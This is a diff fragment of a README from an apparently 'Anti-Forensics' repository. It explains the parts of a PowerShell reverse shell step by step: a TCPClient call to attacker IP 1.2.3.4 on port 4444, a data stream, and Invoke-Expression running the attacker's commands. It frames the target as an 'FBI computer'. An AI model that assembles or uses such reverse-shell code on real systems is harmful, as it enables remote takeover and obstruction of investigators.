ddombro3/Anti-Forensics/README.md

 2.)
 Net.Sockets.TCPClient('1.2.3.4', 4444): This is the reverse part.
 It tells the FBI computer to reach out to the attacker's IP address (1.2.3.4) on port 4444.

-3.) $s=$c.GetStream(): This creates a "data stream"—a two-way pipe for information to travel back and forth.
+3.) $s=$c.GetStream(): This creates a "data stream" a two-way pipe for information to travel back and forth.

 4.) iex $d: This is the most dangerous part.
 IEX stands for Invoke-Expression.
 It takes whatever text the attacker sends from their laptop ($d) and executes it as a live command on the FBI's system.